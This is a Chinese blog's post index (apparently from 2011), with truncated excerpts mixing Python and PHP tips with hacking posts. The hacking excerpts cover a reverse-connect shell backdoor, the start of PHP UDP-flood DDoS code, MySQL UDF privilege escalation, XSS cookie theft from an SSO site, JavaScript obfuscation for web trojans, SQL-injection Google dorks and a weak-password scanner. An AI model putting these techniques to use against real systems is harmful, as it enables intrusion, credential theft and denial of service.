- 博客(394)
- 资源 (22)
- 收藏
- 关注
原创 手动实现cookie 的python3代码
import urllib.request as urre=ur.urlopen('http://192.168.1.105/exp/cookie/test.php')for i in re.getheaders(): if i[0]=='Set-Cookie': print (i[1].split(';')[0])
2011-12-14 14:59:08 1172
转载 MYSQL简单提权--Mix.dll My_udf.dll(老东西,做个备份)
S- serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的 pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不
2011-12-02 10:20:04 2317
转载 Javascript加密解密终级指南escape解密/eval加密/Encode加密原理
本文一共介绍了七种方法:一:最简单的加密解密二:转义字符 "/" 的妙用三:使用 Microsoft 出品的脚本编码器 Script Encoder 来进行编码 (自创简单解码)四:任意添加 NUL 空字符(十六进制 00H ) (自创)五:无用内容混乱以及换行空格 TAB 大法六:自写解密函数法七:错误的利用 (自创) 在做网页时(其实是网页木马呵呵),最让人
2011-11-27 12:33:29 1120
原创 php 过滤函数简介用于跨站分析
过滤字符$text:'". //小于、空格、大于、单引号、双引号。使用函数:addslashes($text)\'\".//转换单双引号使用函数:htmlentities($text) 默认第二个参数( ENT_COMPAT ) 仅编码双引号。< >'". //仅转换了 小于、大于、双引号,未过滤单引号和空格
2011-11-22 11:33:13 763
转载 Finding vulnerabilities in PHP scripts FULL ( with examples )
Name : Finding vulnerabilities in PHP scripts FULL ( with examples ) Author : SirGodEmail : [email protected] : 1) About 2) Some stuff 3) Remote File Inclusion 3.0 - Basic example
2011-11-16 16:02:56 2081
转载 Using XSS to bypass CSRF protection
Using XSS to bypass CSRF protection// Autor: Nytro// Contact: [email protected]// Translated by: SENEQ_o// Published on: 28 Octombrie 2009// Romanian Security Team?>1) About XSS2)
2011-11-16 15:59:55 6101
原创 关于跨站技术的高级简单利用
这里只丢2个代码,用于思路性测试,测试结果也欧克set.php用于模拟正常设置session(一般就是目标用户正常登陆系统后)<?phpsession_start();$_SESSION['user']='admin';$_SESSION['pass']='xtj';?>作为黑客,通过跨站拿到以上用户的cookie以后且拿到了webshell可以采取以下措施。
2011-11-11 15:51:08 654
原创 sso 作用域 窃取cookie 跨站 php 生成png 程序代码
最近在渗透某大型网站,注册后发现其为sso技术,登陆后可以登入任何其分站,包括论坛等。由于策略不严谨,因此存在另外一种思路的跨站漏洞。发现其sso返回cookie 作用域是 .abc.com,仅需以下cookie即可访问了。分析如下Set-Cookie: abcsession=2C521723E6C202D8648F14E9D93C319D; expires=Tue, 08-Nov
2011-11-08 21:44:34 990
原创 写了一个wwwscan的路径生成工具
你可以下载常见脚本整站程序,然后用这个生成如下格式的文本文件,用于wwwscan等fuzz工具使用。\drupal-6.22\.htaccess\drupal-6.22\CHANGELOG.txt\drupal-6.22\COPYRIGHT.txt\drupal-6.22\cron.php\drupal-6.22\index.php\drupal-6.22\INSTALL
2011-11-03 20:08:55 905
转载 Django开发框架多个安全漏洞
影响版本:Django 1.2.5Django 1.3 beta 1Django 1.2.4Django 1.2.2Django 1.2漏洞描述:Django是一款开放源代码的Web应用框架,由Python写成。Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。1)当使用缓存后端时django.contr
2011-10-30 18:03:50 1261
转载 python 反向连接后门
1)首先daemon化2)然后用 netstat命令,检测是否指定的IP(192.168.1.111)连接上,有,则激活无,则睡眠几分钟(这个时间可根据需要自行调节)3)激活后,开一个子进程,创建socket,与运行了监听程序的IP进行连接,并执行一个shell,将该shell的输入输出重定向到socket.4)父进程则等待 shell子进程的执行,如果执行完毕,就继续 检测周而复始…#!/usr
2011-10-30 01:52:40 1645 1
转载 Tiny php shell
Have you ever needed a small shell written in PHP?Of course you have. But I bet it haven't been all too stealth!This is really pointless, but someone might be interested in it.So here you go f
2011-10-27 16:39:29 1037
转载 关于PHP的is_a()函数执行代码的问题
今天看到云舒在群里贴的漏洞公告,原始的文章在http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/ 后来查了下PHP官方的手册,这个问题是在PHP 5.3.7中更新了is_a()函数的功能。is_a()经常被用于条件判断。 在此前版本的is_a() 的第一个
2011-10-27 16:37:31 2082
转载 chrome标签修正特性漏洞
之前的那篇给出了chrome标签修正特性漏洞的两个原型,是在老外发出的11的漏洞思路上的再延展。我说这个是只属于chrome xss filter的标签修正特性有点误导,这个是全局的,来看下面老外发的这个漏洞http://code.google.com/p/chromium/issues/detail?id=68484 测试代码是var x = "pwnedalert(1)
2011-10-27 12:15:37 571
转载 运行cmd状态下MySQL导入导出.sql文件
MySQL导入导出.sql文件步骤如下: 一.MySQL的命令行模式的设置:桌面->我的电脑->属性->环境变量->新建->PATH=“;path\mysql\bin;”其中path为MySQL的安装路径。二.简单的介绍一下命令行进入MySQL的方法:1.C:\>mysql -h hostname -u username -p按ENTER键,等待然后输入密码。这里hos
2011-10-27 09:20:22 1188
转载 深掘XSS漏洞场景之XSS Rootkit
0×00 前言众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型主要分为持久型和非持久型两种:1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。2. 持久型XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客使用的XSS内容经正常功能进入数据库持久保存。3. DOM XSS漏
2011-10-24 08:30:28 1081
转载 PHP字符编码绕过漏洞总结
PHP字符编码绕过漏洞总结 其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过
2011-10-15 02:39:55 895
原创 python+3+打印所有汉字
打印所有汉字python程序for i in range(0x4e00,0x9fa6): print (chr(i))
2011-10-14 09:58:28 2162
原创 PHP整站打包程序
<?php//验证密码,默认//在URL后参加 ?pwd=密码 查看生成密码$password = '3f06f881a9f2545aa335acd0165a3a36';?> ZIP压缩程序<!--html{ba
2011-10-07 22:03:21 2017
转载 Python Web数据抓取(xpath版)
(1)采用SQLite缓存抓取的HTML页面,大大提高了二次数据处理的效率。第一次运行程序大约耗时6小时,以后只需3分钟左右即可完成。(2)采用xpath替换之前的正则表达式进行HTML解析。xpath定位更加简单、方便,而且能够自动修正html错误语法。xpath真强大!!(3
2011-10-03 14:38:27 1323
原创 验证最新可用代理 For http://www.5uproxy.net 多线程版
# coding:gbk# 验证最新可用代理 For http://www.5uproxy.net 多线程版# 2010.12.05import sysreload(sys)sys.setdefaultencoding('gbk')import urllibimport urllib2from urllib2 import URLError, HTTPErrorDEBU
2011-10-03 14:37:18 4179
原创 Python中is和==的区别
通常我们写:if foo is None: pass这个写法与以下的写法有何区别呢?if foo == None: passis当比较的是相同的对象实例时总是返回True。而==则完全决定于__eq__()方法的实现。例如:>>> cl
2011-10-03 14:27:21 687
原创 mysql忘记root密码解决方法
(1)停止mysql服务或结束mysqld.exe进程。(2)命令提示符切换至mysql的bin目录。(3)以不检查权限的方式启动mysql。注意:如果是mysql5.0 这里执行“mysqld-nt -
2011-10-03 14:19:45 575
原创 PHP学习提纲
为公司实习生写的PHP学习提纲,根据自己的学习及项目开发经验总结了PHP语言最核心的知识点。可以作为PHP快速入门的教程。1 客户端脚本和服务端脚本客户端:VBscript(对IE依赖性很强,放弃)、Javascript服务端:ASP、PHP、PerlJSP(服务端,非脚本)Python(可用服务端,非脚本)2 学习一门语言的要点/顺序功能、特点、语
2011-09-26 17:15:31 1138
原创 部分google hacking的搜索内容
inurl:index.php?id=inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:play_old.php?id=inurl:declaration_more.
2011-09-05 22:58:36 54798
原创 python 的密码输入方式
除了getpass模块和input函数以外,还有一个可以使用msvcrt模块的。只是光标有点小问题(其实也可以解决)。代码import msvcrtpass=''while True: b=msvcrt.getch() if not b.
2011-09-02 01:09:56 1381
原创 php udp 流量ddos代码:
<?php// post & data: ip=1.1.1.1&time=999&port=80$packets = 0;$ip = $_POST['ip'];$rand = $_POST['port'];set_time_limit(0);ign
2011-09-01 22:20:39 1239
转载 常见黑客渗透测试工具
因为上面要转了一篇,里面好多我都觉得过时了。不过确实好多我也还在用。哈哈留个备份吧,免得上面又要找我要一、Nessus 是扫描UNIX漏洞的主力工具,随后栖身Windows。主要功能包括本地和远程安全审查,支持client/server结构,具有
2011-08-26 12:54:19 4368
转载 Cython应用手记
Cython应用手记作者:gashero日期:2010-03-29目录1 简介2 基本使用3 调用其他C库3.1 简单例子3.2 重新定义外部C库的定义
2011-08-25 19:26:44 2141
转载 ctypes-Python外部函数库
来之:http://gashero.iteye.com/blog/519837 译者注:翻译的并不完全,不过对于大多数应用是足够了。总体感觉使用ctypes还是比较麻烦,需要自己重新把头文件给用Python写一遍。再者就是对于指针的指针一类还不知怎么实现。结论是我
2011-08-25 19:25:31 2462
原创 python 字典的 setdefault用法
这个函数非常好,其实主要是获取信息,如果获取不到的时候就按照他的参数设置该值。拿字典来说:>>> a={}>>> a['key']='123'>>> print (a){'key': '123'}>>> print (a.setdefault('key','456')) #显示a这个字典的'key'值的内容,因为字典有,所以不会去设置它123
2011-08-19 14:54:23 17430 2
原创 自己写的一个sqlserver弱口令扫描工具辅助脚本(提升扫描速度效率,速度极快)
需要s.exe 和scan.exe不懂的就别看了。下面是bat配套和vbs配套脚本单进程多线程版:@echo offsetlocal enabledelayedexpansion@cd /d "%~dp0":startTitle
2011-08-18 09:51:44 2571
原创 python用win32com模拟浏览器(pam也是一样的原理)
# -*- coding:UTF-8 -*- #!/user/bin/env pythonimport win32com.clientfrom time import sleep loginurl='http://passport.cnblogs.com/login.
2011-08-17 15:05:07 3539 1
转载 dedecms织梦严重0day漏洞(直接进后台)分析及修复
众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”bug被利用步骤如下:http://www.ywen.info/网站后台/
2011-08-17 09:36:11 2586
原创 清楚重复行的2中方法(注意结果)
方式1:a=[1,4,6,8,2,4,5,6,8,3]a=list(set(a))结果:[1, 2, 3, 4, 5, 6, 8]方式2:a=[1,4,6,8,2,4,5,6,8,3]b=[]for i in a:
2011-08-16 15:28:02 723 1
原创 Python Collection 小技巧
独立软件开发者 Alex Marandon 在他的博客中介绍了数个关于 Python Collection 的实用小技巧,在此与诸位分享。判断一个 list 是否为空传统的方式:if len(mylist): # Do somethin
2011-08-14 01:53:20 790
转载 Python模块学习 ---- struct 数据格式转换
Python是一门非常简洁的语言,对于数据类型的表示,不像其他语言预定义了许多类型(如:在C#中,光整型就定义了8种),它只定义了六种基本类型:字符串,整数,浮点数,元组,列表,字典。通过这六种数据类型,我们可以完成大部分工作。但当Python需要通过网络与其他的平台进行交互的时
2011-08-14 01:43:37 1401
转载 抓proxyhttp.net代理脚本
#!/usr/bin/env python # -*- coding: utf-8 -*- ''''' file: proxys.py author: darkbull date: 2011-08-01 desc:
2011-08-14 01:26:54 996
转载 random最常见的用法
Python中的random模块用于生成随机数。下面介绍一下random模块中最常用的几个函数。random.randomrandom.random()用于生成一个0到1的随机符点数: 0 random.uniform random.uniform的函数原型为:
2011-08-13 22:16:00 1117
原创 程序打包sys.path[0]问题
解决方法如下: path=sys.path[0] if os.path.isfile(path): path=os.path.split(path)[0]
2011-08-13 20:36:44 1503
hydra 7.2 win32
2012-04-09
用Python做科学计算
2012-04-04
pyloris-3.2-win32
2012-03-17
PHP Fuzzing行动——源码审计
2012-02-06
类似IE的VC编写浏览器
2012-01-28
Using_XSS_to_bypass_CSRF_protection
2012-01-28
C语言难点及分析.
2012-01-28
向其他进程注入代码的三种方法
2012-01-28
网站安全漏洞的产生分析、处理总结
2011-04-21
VC学习大纲 VC学习讲义
2009-06-09
The Analysis Of Basic MFC Program Running Principle
2008-12-29
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人